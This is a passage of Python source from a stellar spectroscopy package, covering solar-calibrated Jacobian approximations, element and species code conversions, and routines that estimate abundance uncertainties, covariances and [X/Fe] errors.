    return sha(salt.encode("utf-8")).hexdigest()
# Replace the function with its value: the module exposes the digest string.
hashed_id = hashed_id()
def approximate_stellar_jacobian(stellar_parameters, *args):
    """ Approximate the Jacobian of the stellar parameters and
        minimisation parameters, based on calculations from the Sun """
    logger.info("Updated approximation of the Jacobian")
    # NOTE: the expected parameter order here is (teff, vt, logg, feh);
    # compare approximate_stellar_jacobian_2, which uses (teff, logg, vt, feh).
    teff, vt, logg, feh = stellar_parameters[:4]
    # This is the black magic: hard-coded linear responses calibrated on
    # the Sun (coefficients must not be edited casually).
    full_jacobian = np.array([
        [ 5.4393e-08*teff - 4.8623e-04, -7.2560e-02*vt + 1.2853e-01, 1.6258e-02*logg - 8.2654e-02, 1.0897e-02*feh - 2.3837e-02],
        [ 4.2613e-08*teff - 4.2039e-04, -4.3985e-01*vt + 8.0592e-02, -5.7948e-02*logg - 1.2402e-01, -1.1533e-01*feh - 9.2341e-02],
        [-3.2710e-08*teff + 2.8178e-04, 3.8185e-03*vt - 1.6601e-02, -1.2006e-02*logg - 3.5816e-03, -2.8592e-05*feh + 1.4257e-03],
        [-1.7822e-08*teff + 1.8250e-04, 3.5564e-02*vt - 1.1024e-01, -1.2114e-02*logg + 4.1779e-02, -1.8847e-02*feh - 1.0949e-01]
    ])
    # Returned transposed, as expected by the optimizer that consumes it.
    return full_jacobian.T
def approximate_sun_hermes_jacobian(stellar_parameters, *args):
    """
    Approximate the Jacobian of the stellar parameters and
    minimisation parameters, based on calculations using the Sun
    and the HERMES atomic line list, after equivalent widths
    were carefully inspected.
    """
    # logger.info("Updated approximation of the Jacobian")
    # NOTE: the expected parameter order here is (teff, vt, logg, feh).
    teff, vt, logg, feh = stellar_parameters[:4]
    # Previous calibration, kept for reference:
    # full_jacobian = np.array([
    # [ 4.4973e-08*teff - 4.2747e-04, -1.2404e-03*vt + 2.4748e-02, 1.6481e-02*logg - 5.1979e-02, 1.0470e-02*feh - 8.5645e-03],
    # [-9.3371e-08*teff + 6.9953e-04, 5.0115e-02*vt - 3.0106e-01, -6.0800e-02*logg + 6.7056e-02, -4.1281e-02*feh - 6.2085e-02],
    # [-2.1326e-08*teff + 1.9121e-04, 1.0508e-03*vt + 1.1099e-03, -6.1479e-03*logg - 1.7401e-02, 3.4172e-03*feh + 3.7851e-03],
    # [-9.4547e-09*teff + 1.1280e-04, 1.0033e-02*vt - 3.6439e-02, -9.5015e-03*logg + 3.2700e-02, -1.7947e-02*feh - 1.0383e-01]
    # ])
    # After culling abundance outliers,..
    full_jacobian = np.array([
        [ 4.5143e-08*teff - 4.3018e-04, -6.4264e-04*vt + 2.4581e-02, 1.7168e-02*logg - 5.3255e-02, 1.1205e-02*feh - 7.3342e-03],
        [-1.0055e-07*teff + 7.5583e-04, 5.0811e-02*vt - 3.1919e-01, -6.7963e-02*logg + 7.3189e-02, -4.1335e-02*feh - 6.0225e-02],
        [-1.9097e-08*teff + 1.8040e-04, -3.8736e-03*vt + 7.6987e-03, -6.4754e-03*logg - 2.0095e-02, -4.1837e-03*feh - 4.1084e-03],
        [-7.3958e-09*teff + 1.0175e-04, 6.5783e-03*vt - 3.6509e-02, -9.7692e-03*logg + 3.2322e-02, -1.7391e-02*feh - 1.0502e-01]
    ])
    # Returned transposed, as expected by the optimizer that consumes it.
    return full_jacobian.T
def approximate_stellar_jacobian_2(stellar_parameters, *args):
    """ Approximate the Jacobian of the stellar parameters and
        minimisation parameters, based on calculations from the Sun """
    logger.info("Updated approximation of the Jacobian {}".format(stellar_parameters))
    # NOTE: unlike approximate_stellar_jacobian, the parameter order here
    # is (teff, logg, vt, feh); the matrix columns are permuted to match.
    teff, logg, vt, feh = stellar_parameters[:4]
    #if np.isnan(teff): teff = 5000.; logger.info("jacobian: teff=nan->5000")
    #if np.isnan(logg): logg = 2.0; logger.info("jacobian: logg=nan->2.0")
    #if np.isnan(vt): vt = 1.75; logger.info("jacobian: vt=nan->1.75")
    #if np.isnan(feh): feh = -2.0; logger.info("jacobian: feh=nan->-2.0")
    # This is the black magic: hard-coded linear responses calibrated on
    # the Sun (same coefficients as approximate_stellar_jacobian).
    full_jacobian = np.array([
        [ 5.4393e-08*teff - 4.8623e-04, 1.6258e-02*logg - 8.2654e-02, -7.2560e-02*vt + 1.2853e-01, 1.0897e-02*feh - 2.3837e-02],
        [ 4.2613e-08*teff - 4.2039e-04, -5.7948e-02*logg - 1.2402e-01, -4.3985e-01*vt + 8.0592e-02, -1.1533e-01*feh - 9.2341e-02],
        [-3.2710e-08*teff + 2.8178e-04, -1.2006e-02*logg - 3.5816e-03, 3.8185e-03*vt - 1.6601e-02, -2.8592e-05*feh + 1.4257e-03],
        [-1.7822e-08*teff + 1.8250e-04, -1.2114e-02*logg + 4.1779e-02, 3.5564e-02*vt - 1.1024e-01, -1.8847e-02*feh - 1.0949e-01]
    ])
    # Returned transposed, as expected by the optimizer that consumes it.
    return full_jacobian.T
def approximate_sun_hermes_jacobian_2(stellar_parameters, *args):
    """
    Approximate the Jacobian of the stellar parameters and
    minimisation parameters, based on calculations using the Sun
    and the HERMES atomic line list, after equivalent widths
    were carefully inspected.
    """
    # logger.info("Updated approximation of the Jacobian")
    # NOTE: unlike approximate_sun_hermes_jacobian, the parameter order
    # here is (teff, logg, vt, feh); the matrix columns are permuted to match.
    teff, logg, vt, feh = stellar_parameters[:4]
    # Previous calibration, kept for reference:
    # full_jacobian = np.array([
    # [ 4.4973e-08*teff - 4.2747e-04, -1.2404e-03*vt + 2.4748e-02, 1.6481e-02*logg - 5.1979e-02, 1.0470e-02*feh - 8.5645e-03],
    # [-9.3371e-08*teff + 6.9953e-04, 5.0115e-02*vt - 3.0106e-01, -6.0800e-02*logg + 6.7056e-02, -4.1281e-02*feh - 6.2085e-02],
    # [-2.1326e-08*teff + 1.9121e-04, 1.0508e-03*vt + 1.1099e-03, -6.1479e-03*logg - 1.7401e-02, 3.4172e-03*feh + 3.7851e-03],
    # [-9.4547e-09*teff + 1.1280e-04, 1.0033e-02*vt - 3.6439e-02, -9.5015e-03*logg + 3.2700e-02, -1.7947e-02*feh - 1.0383e-01]
    # ])
    # After culling abundance outliers,..
    full_jacobian = np.array([
        [ 4.5143e-08*teff - 4.3018e-04, 1.7168e-02*logg - 5.3255e-02, -6.4264e-04*vt + 2.4581e-02, 1.1205e-02*feh - 7.3342e-03],
        [-1.0055e-07*teff + 7.5583e-04, -6.7963e-02*logg + 7.3189e-02, 5.0811e-02*vt - 3.1919e-01, -4.1335e-02*feh - 6.0225e-02],
        [-1.9097e-08*teff + 1.8040e-04, -6.4754e-03*logg - 2.0095e-02, -3.8736e-03*vt + 7.6987e-03, -4.1837e-03*feh - 4.1084e-03],
        [-7.3958e-09*teff + 1.0175e-04, -9.7692e-03*logg + 3.2322e-02, 6.5783e-03*vt - 3.6509e-02, -1.7391e-02*feh - 1.0502e-01]
    ])
    # Returned transposed, as expected by the optimizer that consumes it.
    return full_jacobian.T
def element_to_species(element_repr):
    """
    Convert a string such as "Fe", "Fe I" or "Fe II" into the floating
    point species code (Z + (ionization - 1)/10, e.g. "Fe II" -> 26.1).
    Known molecule names map to their molecular species codes; any other
    unrecognized string is parsed as a bare float.
    """
    if not isinstance(element_repr, string_types):
        raise TypeError("element must be represented by a string-type")
    if element_repr.count(" ") > 0:
        symbol, ion_str = element_repr.split()[:2]
    else:
        # No ionization given: assume neutral ("I").
        symbol, ion_str = element_repr, "I"
    if symbol in periodic_table:
        # "I" -> +0.0, "II" -> +0.1, "III" -> +0.2, ...
        ion_offset = max([0, ion_str.upper().count("I") - 1]) /10.
        return periodic_table.index(symbol) + 1 + ion_offset
    try:
        return common_molecule_name2species[symbol]
    except KeyError:
        # Unrecognized: assume it is already a numeric species code.
        return float(element_repr)
def element_to_atomic_number(element_repr):
    """
    Convert a string representation of an element ("Fe", "Ti I", "si")
    into its atomic number.  Known molecule names map to a representative
    atomic number; anything else raises ValueError.
    """
    if not isinstance(element_repr, string_types):
        raise TypeError("element must be represented by a string-type")
    symbol = element_repr.title().strip().split()[0]
    try:
        return 1 + periodic_table.index(symbol)
    except IndexError:
        raise ValueError("unrecognized element '{}'".format(element_repr))
    except ValueError:
        # Not a plain element; maybe a known molecule.
        try:
            return common_molecule_name2Z[symbol]
        except KeyError:
            raise ValueError("unrecognized element '{}'".format(element_repr))
def species_to_element(species):
    """
    Convert a floating point species code back into a string such as
    "Fe I" / "Fe II".  Molecular codes map to "El1-El2"; unknown codes are
    returned as str(species).  Isotope digits beyond the first decimal are
    dropped.
    """
    if not isinstance(species, (float, int)):
        raise TypeError("species must be represented by a floating point-type")
    # Strip isotope information, keeping only the ionization decimal.
    if round(species,1) != species:
        species = int(species*10)/10.
    if species + 1 >= len(periodic_table) or 1 > species:
        # Outside the atomic range: probably a molecule.
        try:
            return "-".join(common_molecule_species2elems[species])
        except KeyError:
            # No idea what this is.
            return str(species)
    symbol = periodic_table[int(species) - 1]
    # Neutral = "I", singly ionized = "II", ...
    n_ion = int(round(10 * (species - int(species)) + 1))
    # The special cases with no ionization suffix.
    if symbol in ("C", "H", "He"):
        return symbol
    return "%s %s" % (symbol, "I" * n_ion)
def elems_isotopes_ion_to_species(elem1,elem2,isotope1,isotope2,ion):
    """
    Encode element symbol(s), isotope mass number(s), and ionization stage
    into the floating point species code used throughout SMH
    (e.g. 'Fe', '', 0, 0, 2 -> 26.1).  For molecules (elem2 != ''), the
    integer part concatenates the two atomic numbers (smaller first) and
    the decimals carry the ionization digit plus both isotope masses.
    """
    Z1 = int(element_to_species(elem1.strip()))
    # Zero means "no isotope specified"; otherwise format as two digits.
    if isotope1==0: isotope1=''
    else: isotope1 = str(isotope1).zfill(2)
    if elem2.strip()=='': # Atom
        mystr = "{}.{}{}".format(Z1,int(ion-1),isotope1)
    else: # Molecule
        #assert ion==1,ion
        Z2 = int(element_to_species(elem2.strip()))
        # If one isotope is specified but the other isn't, use a default mass
        # These masses are taken from MOOG for Z=1 to 95
        amu = [1.008,4.003,6.941,9.012,10.81,12.01,14.01,16.00,19.00,20.18,
               22.99,24.31,26.98,28.08,30.97,32.06,35.45,39.95,39.10,40.08,
               44.96,47.90,50.94,52.00,54.94,55.85,58.93,58.71,63.55,65.37,
               69.72,72.59,74.92,78.96,79.90,83.80,85.47,87.62,88.91,91.22,
               92.91,95.94,98.91,101.1,102.9,106.4,107.9,112.4,114.8,118.7,
               121.8,127.6,126.9,131.3,132.9,137.3,138.9,140.1,140.9,144.2,
               145.0,150.4,152.0,157.3,158.9,162.5,164.9,167.3,168.9,173.0,
               175.0,178.5,181.0,183.9,186.2,190.2,192.2,195.1,197.0,200.6,
               204.4,207.2,209.0,210.0,210.0,222.0,223.0,226.0,227.0,232.0,
               231.0,238.0,237.0,244.0,243.0]
        amu = [int(round(x,0)) for x in amu]
        if isotope1 == '':
            if isotope2 == 0:
                isotope2 = ''
            else:
                # NOTE(review): in this branch isotope2 is left as a raw
                # int (not zero-padded) when formatted below -- confirm.
                isotope1 = str(amu[Z1-1]).zfill(2)
        else:
            if isotope2 == 0:
                isotope2 = str(amu[Z2-1]).zfill(2)
            else:
                isotope2 = str(isotope2).zfill(2)
        # Swap if needed so the smaller atomic number leads.
        if Z1 < Z2:
            mystr = "{}{:02}.{}{}{}".format(Z1,Z2,int(ion-1),isotope1,isotope2)
        else:
            mystr = "{}{:02}.{}{}{}".format(Z2,Z1,int(ion-1),isotope2,isotope1)
    return float(mystr)
def species_to_elems_isotopes_ion(species):
    """
    Decompose a floating point species code into
    (elem1, elem2, isotope1, isotope2, ion).  For atoms, elem2 is '' and
    isotope2 is 0; isotopes are 0 when unspecified.  Inverse of
    elems_isotopes_ion_to_species.
    """
    element = species_to_element(species)
    if species >= 100:
        # Molecule: the integer part is two concatenated atomic numbers.
        Z1 = int(species/100)
        Z2 = int(species - Z1*100)
        elem1 = species_to_element(Z1).split()[0]
        elem2 = species_to_element(Z2).split()[0]
        # All molecules that we use are unionized
        ion = 1
        if species == round(species,1):
            # No isotope specified
            isotope1 = 0
            isotope2 = 0
        else: #Both isotopes need to be specified!
            # Digits 2-3 and 4-5 after the decimal are the two masses.
            isotope1 = int(species*1000) - int(species*10)*100
            isotope2 = int(species*100000) - int(species*1000)*100
            if isotope1 == 0 or isotope2 == 0:
                raise ValueError("molecule species must have both isotopes specified: {} -> {} {}".format(species,isotope1,isotope2))
        # Swap if needed
    else:
        # Element
        try:
            elem1,_ion = element.split()
        except ValueError as e:
            # species_to_element returns bare "C", "H", "He" with no
            # ionization suffix; treat those as neutral.
            if element == 'C':
                elem1,_ion = 'C','I'
            elif element == 'H':
                elem1,_ion = 'H','I'
            elif element == 'He':
                elem1,_ion = 'He','I'
            else:
                print(element)
                raise e
        ion = len(_ion)
        assert _ion == 'I'*ion, "{}; {}".format(_ion,ion)
        # Isotope (if any) is encoded in the decimals past the ionization.
        if species == round(species,1):
            isotope1 = 0
        elif species == round(species,4):
            isotope1 = int(species*10000) - int(species*10)*1000
        elif species == round(species,3):
            isotope1 = int(species*1000) - int(species*10)*100
        else:
            raise ValueError("problem determining isotope: {}".format(species))
        elem2 = ''
        isotope2 = 0
    return elem1,elem2,isotope1,isotope2,ion
def get_common_letters(strlist):
    """
    Return the characters shared by all strings in strlist, compared
    position by position (up to the length of the shortest string).
    Positions where every string agrees contribute their character;
    mismatched positions are skipped (so ["abc", "axc"] -> "ac").
    """
    # BUGFIX: the previous implementation used reduce(), which is not a
    # builtin on Python 3 and was never imported (NameError).
    return "".join([chars[0] for chars in zip(*strlist)
                    if all(c == chars[0] for c in chars)])
def find_common_start(strlist):
    """
    Return the characters common to every string in strlist, iterating
    get_common_letters to a fixed point (a copy of the input is used, so
    the caller's list is never modified).
    """
    working = strlist[:]
    last = None
    current = get_common_letters(working)
    while current != last:
        working.append(current)
        last = current
        current = get_common_letters(working)
    return get_common_letters(working)
def extend_limits(values, fraction=0.10, tolerance=1e-2):
    """
    Widen the (min, max) range of the finite entries of `values` by
    `fraction` of the peak-to-peak span on each side.  Degenerate ranges
    (difference below `tolerance`) are widened around the lower value
    instead.  Returns a 2-element numpy array (lower, upper).  Raises
    ValueError when no finite value is present.
    """
    arr = np.array(values)
    finite = np.isfinite(arr)
    if np.sum(finite) == 0:
        raise ValueError("no finite values provided")
    lo = np.min(arr[finite])
    hi = np.max(arr[finite])
    span = np.ptp([lo, hi])
    lower, upper = lo - fraction * span, span * fraction + hi
    if np.abs(lower - upper) < tolerance:
        if np.abs(lower) < tolerance:
            # Arbitrary widening, since we've just been passed zeros.
            offset = 1
        else:
            offset = np.abs(lower) * fraction
        # Degenerate range: widen symmetrically around the lower limit.
        lower, upper = lower - offset, offset + lower
    return np.array([lower, upper])
def get_version():
    """
    Return a version string for Spectroscopy Made Hard derived from the
    current git branch name and commit hash, or "Unknown" when git is not
    available on the PATH.
    """
    if getstatusoutput("which git")[0] != 0:
        return "Unknown"
    commands = ("git rev-parse --abbrev-ref HEAD",
                "git log --pretty=format:'%h' -n 1")
    outputs = [getstatusoutput(command)[1] for command in commands]
    return "0.1dev:" + ":".join(outputs)
def struct2array(x):
    """
    Convert a numpy structured array whose fields all share a single
    scalar dtype into a plain 2D array of shape (Nrow, Nfield).
    """
    ncol = len(x.dtype)
    base = x.dtype[0].type
    # The flat view below is only valid when every field has one dtype.
    assert np.all([x.dtype[i].type == base for i in range(ncol)])
    return x.view(base).reshape((-1, ncol))
def _make_rhomat(rho_Tg=0.0, rho_Tv=0.0, rho_TM=0.0, rho_gv=0.0, rho_gM=0.0, rho_vM=0.0):
rhomat = np.array([[1.0, rho_Tg, rho_Tv, rho_TM],
[rho_Tg, 1.0, rho_gv, rho_gM],
[rho_Tv, rho_gv, 1.0, rho_vM],
[rho_TM, rho_gM, rho_vM, 1.0]])
return rhomat
def process_session_uncertainties_lines(session, rhomat, minerr=0.001):
    """
    Using Sergey's estimator

    Build the per-line measurement table for `session`: one row per
    acceptable, non-upper-limit spectral model, carrying statistical and
    stellar-parameter (systematic) abundance errors.  A per-species
    systematic error floor ("e_sys") and effective line weights are then
    estimated iteratively from the line-to-line scatter.

    rhomat : 4x4 stellar-parameter correlation matrix (see _make_rhomat).
    minerr : statistical-error floor added in quadrature to every line.
    Returns an astropy Table.
    """
    from .spectral_models import ProfileFittingModel, SpectralSynthesisModel
    from .photospheres.abundances import asplund_2009 as solar_composition
    cols = ["index","wavelength","species","expot","loggf",
            "logeps","e_stat","eqw","e_eqw","fwhm",
            "e_Teff","e_logg","e_vt","e_MH","e_sys",
            "e_tot","weight"]
    data = OrderedDict(zip(cols, [[] for col in cols]))
    for i, model in enumerate(session.spectral_models):
        # Skip rejected measurements and upper limits.
        if not model.is_acceptable: continue
        if model.is_upper_limit: continue
        wavelength = model.wavelength
        species = np.ravel(model.species)[0]
        expot = model.expot
        loggf = model.loggf
        if np.isnan(expot) or np.isnan(loggf):
            print(i, species, model.expot, model.loggf)
        try:
            logeps = model.abundances[0]
            staterr = model.metadata["1_sigma_abundance_error"]
            if isinstance(model, SpectralSynthesisModel):
                # Take the fit-covariance error if it is larger.
                (named_p_opt, cov, meta) = model.metadata["fitted_result"]
                if np.isfinite(cov[0,0]**0.5):
                    staterr = max(staterr, cov[0,0]**0.5)
            assert ~np.isnan(staterr)
            # apply minimum
            staterr = np.sqrt(staterr**2 + minerr**2)
            # Abundance responses to each stellar-parameter perturbation.
            sperrdict = model.metadata["systematic_stellar_parameter_abundance_error"]
            e_Teff = sperrdict["effective_temperature"]
            e_logg = sperrdict["surface_gravity"]
            e_vt = sperrdict["microturbulence"]
            e_MH = sperrdict["metallicity"]
            e_all = np.array([e_Teff, e_logg, e_vt, e_MH])
            # Quadrature sum including parameter correlations.
            syserr_sq = e_all.T.dot(rhomat.dot(e_all))
            syserr = np.sqrt(syserr_sq)
            fwhm = model.fwhm
        except Exception as e:
            # Keep the row but flag all derived quantities as NaN.
            print("ERROR!!!")
            print(i, species, model.wavelength)
            print("Exception:",e)
            logeps, staterr, e_Teff, e_logg, e_vt, e_MH, syserr = np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan
        if isinstance(model, ProfileFittingModel):
            eqw = model.equivalent_width or np.nan
            e_eqw = model.equivalent_width_uncertainty or np.nan
        else:
            # Synthesis models carry no equivalent width here.
            eqw = -999
            e_eqw = -999
        #toterr = np.sqrt(staterr**2 + syserr**2)
        input_data = [i, wavelength, species, expot, loggf,
                      logeps, staterr, eqw, e_eqw, fwhm,
                      e_Teff, e_logg, e_vt, e_MH, syserr,
                      np.nan, np.nan]
        for col, x in zip(cols, input_data):
            data[col].append(x)
    tab = astropy.table.Table(data)
    # Calculate systematic error and effective weights for each species
    tab["e_sys"] = np.nan
    for species in np.unique(tab["species"]):
        ix = np.where(tab["species"]==species)[0]
        t = tab[ix]
        # Estimate systematic error s
        s = s_old = 0.
        s_max = 2.
        delta = struct2array(t["e_Teff","e_logg","e_vt","e_MH"].as_array())
        ex = t["e_stat"]
        # Iterate: given s, compute weights and the weighted mean; then
        # re-solve for the s that zeroes func (balances the scatter).
        for i in range(35):
            sigma_tilde = np.diag(s**2 + ex**2) + (delta.dot(rhomat.dot(delta.T)))
            sigma_tilde_inv = np.linalg.inv(sigma_tilde)
            w = np.sum(sigma_tilde_inv, axis=1)
            xhat = np.sum(w*t["logeps"])/np.sum(w)
            dx = t["logeps"] - xhat
            def func(s):
                return np.sum(dx**2 / (ex**2 + s**2)**2) - np.sum(1/(ex**2 + s**2))
            # If [0, s_max] cannot bracket a root, no extra scatter is needed.
            if func(0) < func(s_max):
                s = 0
                break
            s = optimize.brentq(func, 0, s_max, xtol=.001)
            if np.abs(s_old - s) < 0.01:
                break
            s_old = s
        else:
            # for-else: reached only when the 35 iterations never broke.
            print(species,"s did not converge!")
        print("Final in {} iter: {:.1f} {:.3f}".format(i+1, species, s))
        tab["e_sys"][ix] = s
        tab["e_tot"][ix] = np.sqrt(s**2 + ex**2)
        # Recompute the final weights with the converged s.
        sigma_tilde = np.diag(tab["e_tot"][ix]**2) + (delta.dot(rhomat.dot(delta.T)))
        sigma_tilde_inv = np.linalg.inv(sigma_tilde)
        w = np.sum(sigma_tilde_inv, axis=1)
        wb = np.sum(sigma_tilde_inv, axis=0)
        assert np.allclose(w,wb,rtol=1e-6), "Problem in species {:.1f}, Nline={}, e_sys={:.2f}".format(species, len(t), s)
        tab["weight"][ix] = w
    for col in tab.colnames:
        if col in ["index", "wavelength", "species", "loggf", "star"]: continue
        tab[col].format = ".3f"
    return tab
def process_session_uncertainties_covariance(summary_tab, rhomat):
    """
    Build the between-species abundance covariance matrix from the
    weighted stellar-parameter error columns of `summary_tab`.

    Returns (var_X, cov_XY): var_X = e_XH**2 per species, and
    cov_XY[i, j] = Cov(X_i, X_j) induced by the correlated stellar
    parameters (symmetric; diagonal entries are Var(X)).
    """
    sp_errs = struct2array(np.array(summary_tab["e_Teff_w","e_logg_w","e_vt_w","e_MH_w"]))
    cov_XY = sp_errs.dot(rhomat.dot(sp_errs.T))
    # Sanity check: the construction should be symmetric.
    asym = np.abs(cov_XY - cov_XY.T)
    assert np.all(asym < 0.01**2), np.max(np.abs(asym))
    # Variances come from the quoted [X/H] errors rather than the
    # covariance diagonal.
    var_X = summary_tab["e_XH"]**2
    return var_X, cov_XY
def process_session_uncertainties_calc_xfe_errors(summary_tab, var_X, cov_XY):
    """
    Computes the following
    Var([X/Fe]) = Var(X) + Var(Fe) - 2 Cov(X, Fe)
    Does *not* compute covariances, but you can do that this way:
    Cov([X/Fe], [Fe/H]) = Cov(X,Fe) - Cov(Fe, Fe)

    summary_tab : per-species abundance summary table with "species" and
        "[X/H]" columns (one row per species).
    var_X : array of per-species abundance variances, aligned with rows.
    cov_XY : covariance matrix between species abundances, aligned with rows.

    Returns (feh1, exfe1, feh2, exfe2): the Fe I and Fe II [X/H] values and
    the corresponding [X/Fe] error arrays for every species.
    """
    # [X/Fe] errors are the Fe1 and Fe2 parts of the covariance matrix
    try:
        # Fe I is species code 26.0; use the first matching row.
        ix1 = np.where(summary_tab["species"]==26.0)[0][0]
    except IndexError:
        print("No feh1: setting to nan")
        feh1 = np.nan
        exfe1 = np.nan
    else:
        feh1 = summary_tab["[X/H]"][ix1]
        var_fe1 = var_X[ix1]
        # Var(X/Fe1) = Var(X) + Var(Fe1) - 2*Cov(X,Fe1)
        exfe1 = np.sqrt(var_X + var_fe1 - 2*cov_XY[ix1,:])
    try:
        # Fe II is species code 26.1.
        ix2 = np.where(summary_tab["species"]==26.1)[0][0]
    except IndexError:
        print("No feh2: setting to feh1")
        feh2 = feh1
        try:
            # NOTE(review): this fallback is sqrt(Var(Fe I)) only -- a
            # scalar, unlike the per-species arrays of the other branches.
            # Confirm this is intended.
            exfe2 = np.sqrt(var_X[ix1])
        except UnboundLocalError: # no ix1 either
            exfe2 = np.nan
    else:
        feh2 = summary_tab["[X/H]"][ix2]
        var_fe2 = var_X[ix2]
        # Var(X/Fe2) = Var(X) + Var(Fe2) - 2*Cov(X,Fe2)
        exfe2 = np.sqrt(var_X + var_fe2 - 2*cov_XY[ix2,:])
    return feh1, exfe1, feh2, exfe2
def process_session_uncertainties_abundancesummary(tab, rhomat):
    """
    Take a table of lines and turn them into standard abundance table

    For every unique species in `tab`, compute straight and weighted
    abundance statistics, the (weighted) abundance response to each stellar
    parameter, the combined stellar-parameter error (through `rhomat`),
    [X/H], and finally [X/Fe] relative to Fe I and Fe II.
    Returns an astropy Table with one row per species.
    """
    from .spectral_models import ProfileFittingModel, SpectralSynthesisModel
    from .photospheres.abundances import asplund_2009 as solar_composition
    unique_species = np.unique(tab["species"])
    cols = ["species","elem","N",
            "logeps","sigma","stderr",
            "logeps_w","sigma_w","stderr_w",
            "e_Teff","e_logg","e_vt","e_MH","e_sys",
            "e_Teff_w","e_logg_w","e_vt_w","e_MH_w","e_sys_w",
            "[X/H]","e_XH","s_X"]
    data = OrderedDict(zip(cols, [[] for col in cols]))
    for species in unique_species:
        ttab = tab[tab["species"]==species]
        elem = species_to_element(species)
        N = len(ttab)
        # Unweighted statistics over all lines of this species.
        logeps = np.mean(ttab["logeps"])
        stdev = np.std(ttab["logeps"])
        stderr = stdev/np.sqrt(N)
        # Weighted statistics using the per-line weights computed during
        # the systematic-error estimation.
        w = ttab["weight"]
        finite = np.isfinite(w)
        if finite.sum() != N:
            print("WARNING: species {:.1f} N={} != finite weights {}".format(species, N, finite.sum()))
        x = ttab["logeps"]
        logeps_w = np.sum(w*x)/np.sum(w)
        stdev_w = np.sqrt(np.sum(w*(x-logeps_w)**2)/np.sum(w))
        stderr_w = np.sqrt(1/np.sum(w))
        # Mean (and weighted-mean) abundance response to perturbing each
        # stellar parameter.
        sperrs = []
        sperrs_w = []
        for spcol in ["Teff","logg","vt","MH"]:
            x_new = x + ttab["e_"+spcol]
            e_sp = np.mean(x_new) - logeps
            sperrs.append(e_sp)
            #e_sp_w = np.sum(w*x_new)/np.sum(w) - logeps_w
            e_sp_w = np.sum(w*ttab["e_"+spcol])/np.sum(w)
            sperrs_w.append(e_sp_w)
        sperrs = np.array(sperrs)
        sperrs_w = np.array(sperrs_w)
        # Combine the four responses through the correlation matrix.
        sperrtot = np.sqrt(sperrs.T.dot(rhomat.dot(sperrs)))
        sperrtot_w = np.sqrt(sperrs_w.T.dot(rhomat.dot(sperrs_w)))
        XH = logeps_w - solar_composition(species)
        #e_XH = np.sqrt(stderr_w**2 + sperrtot_w**2)
        e_XH = stderr_w
        # e_sys is constant within a species by construction; keep one copy.
        s_X = ttab["e_sys"][0]
        assert np.allclose(ttab["e_sys"], s_X), s_X
        input_data = [species, elem, N,
                      logeps, stdev, stderr,
                      logeps_w, stdev_w, stderr_w,
                      sperrs[0], sperrs[1], sperrs[2], sperrs[3], sperrtot,
                      sperrs_w[0], sperrs_w[1], sperrs_w[2], sperrs_w[3], sperrtot_w,
                      XH, e_XH, s_X
                      ]
        assert len(cols) == len(input_data)
        for col, x in zip(cols, input_data):
            data[col].append(x)
    summary_tab = astropy.table.Table(data)
    ## Add in [X/Fe]
    var_X, cov_XY = process_session_uncertainties_covariance(summary_tab, rhomat)
    feh1, efe1, feh2, efe2 = process_session_uncertainties_calc_xfe_errors(summary_tab, var_X, cov_XY)
    if len(summary_tab["[X/H]"]) > 0:
        summary_tab["[X/Fe1]"] = summary_tab["[X/H]"] - feh1
        summary_tab["e_XFe1"] = efe1
        summary_tab["[X/Fe2]"] = summary_tab["[X/H]"] - feh2
        summary_tab["e_XFe2"] = efe2
        # Species with a fractional part (e.g. 26.1) are ionized: reference
        # them to Fe II; neutrals are referenced to Fe I.
        ixion = np.array([x - int(x) > .01 for x in summary_tab["species"]])
        summary_tab["[X/Fe]"] = summary_tab["[X/Fe1]"]
        summary_tab["e_XFe"] = summary_tab["e_XFe1"]
        summary_tab["[X/Fe]"][ixion] = summary_tab["[X/Fe2]"][ixion]
        summary_tab["e_XFe"][ixion] = summary_tab["e_XFe2"][ixion]
        for col in summary_tab.colnames:
            if col=="N" or col=="species" or col=="elem": continue
            summary_tab[col].format = ".3f"
    else:
        # Empty table: still add the [X/Fe] columns so downstream code can
        # rely on their presence.
        for col in ["[X/Fe]","[X/Fe1]","[X/Fe2]",
                    "e_XFe","e_XFe1","e_XFe2"]:
            summary_tab.add_column(astropy.table.Column(np.zeros(0),col))
        #summary_tab[col] = np.nan #.add_column(col)
    return summary_tab
def process_session_uncertainties_limits(session, tab, summary_tab, rhomat):
    """
    Append upper-limit lines to the line table and upper-limit species to
    the per-species summary table.

    session : session whose spectral_models are scanned for acceptable
        upper-limit models.
    tab : line measurement table (extended via vstack).
    summary_tab : per-species summary table (extended via vstack).
    rhomat : 4x4 stellar-parameter correlation matrix.

    Returns (tab, summary_tab) with the limits included; limit rows carry
    NaN in every error/statistics column.
    """
    from .spectral_models import ProfileFittingModel, SpectralSynthesisModel
    from .photospheres.abundances import asplund_2009 as solar_composition
    ## Add in upper limits to line data
    cols = ["index","wavelength","species","expot","loggf",
            "logeps","e_stat","eqw","e_eqw","fwhm",
            "e_Teff","e_logg","e_vt","e_MH","e_sys",
            "e_tot","weight"]
    # Fe abundances needed to convert logeps limits into [X/Fe] limits
    var_X, cov_XY = process_session_uncertainties_covariance(summary_tab, rhomat)
    feh1, efe1, feh2, efe2 = process_session_uncertainties_calc_xfe_errors(summary_tab, var_X, cov_XY)
    assert len(cols)==len(tab.colnames)
    data = OrderedDict(zip(cols, [[] for col in cols]))
    for i, model in enumerate(session.spectral_models):
        if not model.is_upper_limit: continue
        if not model.is_acceptable: continue
        wavelength = model.wavelength
        species = np.ravel(model.species)[0]
        # NOTE(review): `or np.nan` also maps a legitimate 0.0 expot/loggf
        # to NaN — confirm that is intended.
        expot = model.expot or np.nan
        loggf = model.loggf or np.nan
        try:
            logeps = model.abundances[0]
        except:  # no abundance available for this model
            logeps = np.nan
        # NOTE(review): input_data has 19 entries vs 17 cols; zip() silently
        # drops the trailing two NaNs, so this is harmless but confusing.
        input_data = [i, wavelength, species, expot, loggf,
                      logeps, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan,
                      np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan]
        for col, x in zip(cols, input_data):
            data[col].append(x)
    tab_ul = astropy.table.Table(data)
    tab_ul["logeps"].format = ".3f"
    tab = astropy.table.vstack([tab, tab_ul])
    ## Add in upper limits to summary table
    ul_species = np.unique(tab_ul["species"])
    cols = ["species","elem","N",
            "logeps","sigma","stderr",
            "logeps_w","sigma_w","stderr_w",
            "e_Teff","e_logg","e_vt","e_MH","e_sys",
            "e_Teff_w","e_logg_w","e_vt_w","e_MH_w","e_sys_w",
